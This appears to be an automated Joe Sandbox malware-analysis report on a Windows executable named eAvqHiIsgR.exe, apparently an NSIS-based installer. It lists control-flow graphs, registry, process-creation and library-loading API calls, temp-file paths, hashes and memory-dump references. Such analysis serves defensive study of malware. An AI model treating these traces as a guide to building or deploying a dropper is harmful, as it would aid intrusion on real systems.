                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: CountFileNameTempTick
                                                                      • String ID: "C:\Users\user\Desktop\eAvqHiIsgR.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                      • API String ID: 1716503409-3058356216
                                                                      • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                      • Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
                                                                      • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                      • Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 789 402cd0-402cf9 call 405f7d 791 402cfe-402d02 789->791 792 402db3-402db7 791->792 793 402d08-402d0c 791->793 794 402d31-402d44 793->794 795 402d0e-402d2f RegEnumValueA 793->795 797 402d6d-402d74 RegEnumKeyA 794->797 795->794 796 402d98-402da6 RegCloseKey 795->796 796->792 798 402d46-402d48 797->798 799 402d76-402d88 RegCloseKey call 406500 797->799 798->796 800 402d4a-402d5e call 402cd0 798->800 805 402da8-402dae 799->805 806 402d8a-402d96 RegDeleteKeyA 799->806 800->799 807 402d60-402d6c 800->807 805->792 806->792 807->797
                                                                      APIs
                                                                      • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: CloseEnum$DeleteValue
                                                                      • String ID:
                                                                      • API String ID: 1354259210-0
                                                                      • Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                                      • Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
                                                                      • Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                                      • Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 808 72a416db-72a41717 call 72a41a98 812 72a41834-72a41836 808->812 813 72a4171d-72a41721 808->813 814 72a41723-72a41729 call 72a422af 813->814 815 72a4172a-72a41737 call 72a422f1 813->815 814->815 820 72a41767-72a4176e 815->820 821 72a41739-72a4173e 815->821 822 72a41770-72a4178c call 72a424d8 call 72a41559 call 72a41266 GlobalFree 820->822 823 72a4178e-72a41792 820->823 824 72a41740-72a41741 821->824 825 72a41759-72a4175c 821->825 848 72a417e3-72a417e7 822->848 826 72a41794-72a417da call 72a4156b call 72a424d8 823->826 827 72a417dc-72a417e2 call 72a424d8 823->827 830 72a41743-72a41744 824->830 831 72a41749-72a4174a call 72a42a38 824->831 825->820 828 72a4175e-72a4175f call 72a42cc3 825->828 826->848 827->848 842 72a41764 828->842 836 72a41746-72a41747 830->836 837 72a41751-72a41757 call 72a426b2 830->837 839 72a4174f 831->839 836->820 836->831 847 72a41766 837->847 839->842 842->847 847->820 851 72a41824-72a4182b 848->851 852 72a417e9-72a417f7 call 72a4249e 848->852 851->812 855 72a4182d-72a4182e GlobalFree 851->855 858 72a4180f-72a41816 852->858 859 72a417f9-72a417fc 852->859 855->812 858->851 860 72a41818-72a41823 call 72a414e2 858->860 859->858 861 72a417fe-72a41806 859->861 860->851 861->858 862 72a41808-72a41809 FreeLibrary 861->862 862->858
                                                                      APIs
                                                                        • Part of subcall function 72A41A98: GlobalFree.KERNEL32(?), ref: 72A41D09
                                                                        • Part of subcall function 72A41A98: GlobalFree.KERNEL32(?), ref: 72A41D0E
                                                                        • Part of subcall function 72A41A98: GlobalFree.KERNEL32(?), ref: 72A41D13
                                                                      • GlobalFree.KERNEL32(00000000), ref: 72A41786
                                                                      • FreeLibrary.KERNEL32(?), ref: 72A41809
                                                                      • GlobalFree.KERNEL32(00000000), ref: 72A4182E
                                                                        • Part of subcall function 72A422AF: GlobalAlloc.KERNEL32(00000040,?), ref: 72A422E0
                                                                        • Part of subcall function 72A426B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,72A41757,00000000), ref: 72A42782
                                                                        • Part of subcall function 72A4156B: wsprintfA.USER32 ref: 72A41599
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3692894064.0000000072A41000.00000020.00000001.01000000.00000005.sdmp, Offset: 72A40000, based on PE: true
                                                                      • Associated: 00000000.00000002.3692870436.0000000072A40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3692910209.0000000072A43000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3692981384.0000000072A45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_72a40000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc$Librarywsprintf
                                                                      • String ID:
                                                                      • API String ID: 3962662361-3916222277
                                                                      • Opcode ID: 42c27de687661636f0957659b19b39f875fb787104b1478d4847bdf60cd98af8
                                                                      • Instruction ID: 26ac35176fd03ecb437a920a7a6a7c97d193dd42d422202b5025ee7bb55ed4c8
                                                                      • Opcode Fuzzy Hash: 42c27de687661636f0957659b19b39f875fb787104b1478d4847bdf60cd98af8
                                                                      • Instruction Fuzzy Hash: 30416F72540204DBCB019B6CDAC4B963BECBB08328F64B469E9079A09EDF75D546CBA1

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 865 401c2e-401c4e call 402bac * 2 870 401c50-401c57 call 402bce 865->870 871 401c5a-401c5e 865->871 870->871 872 401c60-401c67 call 402bce 871->872 873 401c6a-401c70 871->873 872->873 876 401c72-401c8e call 402bac * 2 873->876 877 401cbe-401ce4 call 402bce * 2 FindWindowExA 873->877 889 401c90-401cac SendMessageTimeoutA 876->889 890 401cae-401cbc SendMessageA 876->890 888 401cea 877->888 891 401ced-401cf0 888->891 889->891 890->888 892 401cf6 891->892 893 402a5a-402a69 891->893 892->893
                                                                      APIs
                                                                      • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                      • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Timeout
                                                                      • String ID: !
                                                                      • API String ID: 1777923405-2657877971
                                                                      • Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                                      • Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
                                                                      • Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                                      • Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 896 402476-4024a7 call 402bce * 2 call 402c5e 903 402a5a-402a69 896->903 904 4024ad-4024b7 896->904 906 4024c7-4024ca 904->906 907 4024b9-4024c6 call 402bce lstrlenA 904->907 908 4024e1-4024e4 906->908 909 4024cc-4024e0 call 402bac 906->909 907->906 914 4024f5-402509 RegSetValueExA 908->914 915 4024e6-4024f0 call 4030d8 908->915 909->908 918 40250b 914->918 919 40250e-4025eb RegCloseKey 914->919 915->914 918->919 919->903
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nso2EAF.tmp,00000023,00000011,00000002), ref: 004024C1
                                                                      • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nso2EAF.tmp,00000000,00000011,00000002), ref: 00402501
                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso2EAF.tmp,00000000,00000011,00000002), ref: 004025E5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: CloseValuelstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nso2EAF.tmp
                                                                      • API String ID: 2655323295-1291088236
                                                                      • Opcode ID: 7a7c23c04c90be8b3e585445916e0e680a3a1629c3414f9b9df94d306a1b16c3
                                                                      • Instruction ID: f8068cdfa95035626473adca5f51816a5c1db3e2bbb00f719c7efdf62c59a762
                                                                      • Opcode Fuzzy Hash: 7a7c23c04c90be8b3e585445916e0e680a3a1629c3414f9b9df94d306a1b16c3
                                                                      • Instruction Fuzzy Hash: 12118171E00218AFEF10AFA59E89EAE7A74EB44314F20443BF505F71D1D6B99D419B28
                                                                      APIs
                                                                      • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                                        • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,759223A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                        • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,759223A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                        • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,759223A0), ref: 0040527A
                                                                        • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                        • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                        • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                        • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                      • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                                      • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                      • String ID:
                                                                      • API String ID: 2987980305-0
                                                                      • Opcode ID: 2b161932b8e15f20ea054abb7da5fd45cac2ee1996f8da02ed958f71ebdc799e
                                                                      • Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
                                                                      • Opcode Fuzzy Hash: 2b161932b8e15f20ea054abb7da5fd45cac2ee1996f8da02ed958f71ebdc799e
                                                                      • Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E
                                                                      APIs
                                                                        • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,75923410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                                        • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                                        • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                                      • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                        • Part of subcall function 004056E4: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                                      • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,000000F0), ref: 0040163C
                                                                      Strings
                                                                      • C:\Users\user\tranchet\Trykmaalere, xrefs: 00401631
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                      • String ID: C:\Users\user\tranchet\Trykmaalere
                                                                      • API String ID: 1892508949-1178395610
                                                                      • Opcode ID: 6f48d1f4569c46ba79332d618e5f2744522d6a7c4d3c9928c8ba38f6ac20f072
                                                                      • Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
                                                                      • Opcode Fuzzy Hash: 6f48d1f4569c46ba79332d618e5f2744522d6a7c4d3c9928c8ba38f6ac20f072
                                                                      • Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E
                                                                      APIs
                                                                      • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,0042A070,?,?,?,00000002,Call,?,00406293,80000002), ref: 00406024
                                                                      • RegCloseKey.KERNELBASE(?,?,00406293,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,0042A070), ref: 0040602F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: CloseQueryValue
                                                                      • String ID: Call
                                                                      • API String ID: 3356406503-1824292864
                                                                      • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                      • Instruction ID: 43fb42cdfa68b2f9ef01d23c83e90927a4e1ed7766022ad00d18a88e1c3f91d6
                                                                      • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                      • Instruction Fuzzy Hash: 9F01BC72100209ABCF22CF20CC09FDB3FA9EF45364F00403AF916A2191D238C968CBA4
                                                                      APIs
                                                                      • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                                      • CloseHandle.KERNEL32(?), ref: 004057CC
                                                                      Strings
                                                                      • Error launching installer, xrefs: 004057A9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateHandleProcess
                                                                      • String ID: Error launching installer
                                                                      • API String ID: 3712363035-66219284
                                                                      • Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                                      • Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
                                                                      • Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                                      • Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C
                                                                      APIs
                                                                      • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025BA
                                                                      • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025CD
                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso2EAF.tmp,00000000,00000011,00000002), ref: 004025E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: Enum$CloseValue
                                                                      • String ID:
                                                                      • API String ID: 397863658-0
                                                                      • Opcode ID: 7b99555fd6f8dae37ea9679ab54f9e8123d87756e6997b06f3b56209368cff92
                                                                      • Instruction ID: ee0fd62ac357f9525b55a30647733f0e3798e9bebba0400de635a53faed38b57
                                                                      • Opcode Fuzzy Hash: 7b99555fd6f8dae37ea9679ab54f9e8123d87756e6997b06f3b56209368cff92
                                                                      • Instruction Fuzzy Hash: 22017C71604204FFE7219F549E99ABF7ABCEF40358F20403EF505A61C0DAB88A459629
                                                                      APIs
                                                                      • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402546
                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso2EAF.tmp,00000000,00000011,00000002), ref: 004025E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: CloseQueryValue
                                                                      • String ID:
                                                                      • API String ID: 3356406503-0
                                                                      • Opcode ID: 6213eafd8b46f955f614869397e07eb9b1fadeed980eca135cc1a2a492507a25
                                                                      • Instruction ID: 101e8c123746c764c526cee79e76b60048690b918ccacca24166b7bb3c1ff757
                                                                      • Opcode Fuzzy Hash: 6213eafd8b46f955f614869397e07eb9b1fadeed980eca135cc1a2a492507a25
                                                                      • Instruction Fuzzy Hash: EA11C171A00205EFDF25DF64CE985AE7AB4EF00355F20843FE446B72C0D6B88A86DB19
                                                                      APIs
                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                      • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
